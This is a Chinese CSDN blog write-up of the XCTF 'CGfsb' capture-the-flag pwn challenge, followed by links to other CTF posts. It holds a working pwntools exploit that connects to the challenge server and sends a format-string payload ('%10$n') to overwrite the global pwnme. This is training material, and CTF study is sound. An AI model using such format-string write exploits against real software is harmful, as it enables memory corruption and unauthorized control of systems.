xctf - cgfsb

最新推荐文章于 2023-11-08 19:42:58 发布
最新推荐文章于 2023-11-08 19:42:58 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: Hacker之路 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/95228567
版权

查看程序保护
在这里插入图片描述

用IDA 打开
在这里插入图片描述
查看24行代码可知,通过修改全局变量pwnme = 8 则结束。
使用gdb 动态调试。

漏洞代码;
在这里插入图片描述
pwnme 地址,
在这里插入图片描述
exp:

from pwn import *
sh = remote('111.198.29.45',36640)
sh.recv()
sh.sendline('hacker')
sh.recv()
payload = p32(0x804a068) +'aaaa' +'%10$n'
sh.sendline(payload)
sh.interactive()
heri2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
xctf新手区(附详细过程)
qq_39670065的博客
09-15 2461
攻防世界
XCTF-HW-pipeline附件
最新发布
11-09
附件
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 3987
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
XCTF总决赛的赛制以及新型攻防赛题之探索
m0_61101264的博客
11-08 366
这次比赛我也学到了很多,一方面是对题目的把控,我的引导性不够强,导致发展一度没有往我所预期的方向,另外一个忽略的部分就是这种交互提升的设计,应该需要加入明牌设计,双方能够部分获取到对方的信息,例如防守方的信息可以公开,这样加速针对性进化。其余就是实现上的一些细节了,这次由于测试不充分出了很多问题,这个就是经验了,下次应该就不会有了(不过或许下次我就不再写 AD 了。。。太容易出问题了)。最后希望各位高抬贵手吧,为了大家能够有玩的感觉,我花了好长时间去搜索资料寻找思路来设计,虽然最后表现不佳。。
信息安全类-XCTF_OJ练习平台
山里樵夫俗称大叔
10-25 9378
资源网站名称:XCTF_OJ练习平台 网址:http://oj.xctf.org.cn/ 简介: XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络安全技术对抗赛练习平台。 XCTF-OJ平台将汇集国内外CTF网络安全竞赛的真题题库,并支持对部分可获取在线题目交互环境的重现恢复,XCTF联赛后续
XCTF 新手 RE maze
A_dmin的博客
07-03 1506
XCTF 新手 RE maze 一天一道CTF题目,能多不能少 今天没有心思复习,于是打开XCTF想找个题目做一下,结果发现这道题目有50多天没解决,,, 想看看到底是什么题目,这么久没写,啊哈哈哈 由题目得知这个题可能是迷宫,,,,, 下载文件,用ida打开(64位) 找到主函数~,太长了不好截图,就把源码贴出来吧,源码如下: __int64 __fastcall main(__int64 a...
3月29日,第七届XCTF国际联赛总决赛首日战报公布!
Cyberpeace的博客
03-30 116
首日战报公布
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4092
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
XCTF练习题---MISC---glance-50
liu914589417的博客
12-28 296
XCTF练习题—MISC—glance-50 **flag:TWCTF{Bliss by Charles O’Rear} ** 解题步骤: 1、观察题目,下载附件 2、下载完成以后,隐隐约约像是一张动图,遇到动图(gif)很简单,拆分一下看看 3、我真是吐了,200帧,由于并不擅长Python代码,果断进行手动补齐,这里推荐WPS的PPT,自动对齐功能爱了,经过40分钟的艰苦奋战,拼完了这200帧的图片,如下图 4、答案显而易见,照葫芦画瓢写下来,提交答案,完成 博客园地址:https://www.
XCTF:NewsCenter
Keepb1ue的博客
01-12 1616
一道简单的常规注入题
[XCTF]glance-50(难度1)
Mr_Fmnwon的博客
11-10 577
遇到了gif这种动态图,需要将一帧一帧提取找到三种方法:①kali环境下convert分解+montage合成 ②交给网站来 ③stegsolve一帧帧分解再手动拼合一、convert分解convert功能极其强大强大的convert命令convert命令可以用来转换图像的格式,支持JPG, BMP, PCX, GIF, PNG, TIFF, XPM和XWD等类型,下面举几个例子:convert xxx.jpg xxx.png 将jpeg转成png文件。
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 810
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
xctf web题
05-09 3195
view_source 难度系数: 题目来源: Cyberpeace-n3k0 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了 可以通过view-source:的方法来访问源码: view-source:加上url 在url中提交后便可访问页面源码,在源码中可找到flag。 这个题目很简单,但是如果使用的浏览器是ie edge等,用例如 view-source:htt...
CGfsb--writeup
ATFWUS的博客
03-03 463
文件下载地址: 链接:https://pan.baidu.com/s/1a9zj-OQAOgTw7KooZPBBaQ 提取码:y9wi 0x01.分析 checksec: 32位程序,没有开启ASLR。 查看源码: 利用漏洞: 在查看源码的时候,很明显的发现23行存在格式化字符串漏洞,后面如果pwnme等于8,那么就可以直接得到flag,所以我们要利用格式化字符串漏洞修改p...
CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb
半岛铁盒的博客
02-25 1026
一.分析 pwnme的地址为0x804A068 思路: 利用格式化字符串漏洞来使 pwnme的值为8; 二.做题过程 首先,我们得查一下我们输入进去的数据在栈中偏移了多少,知道偏移量后我们才能将其对应起来
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值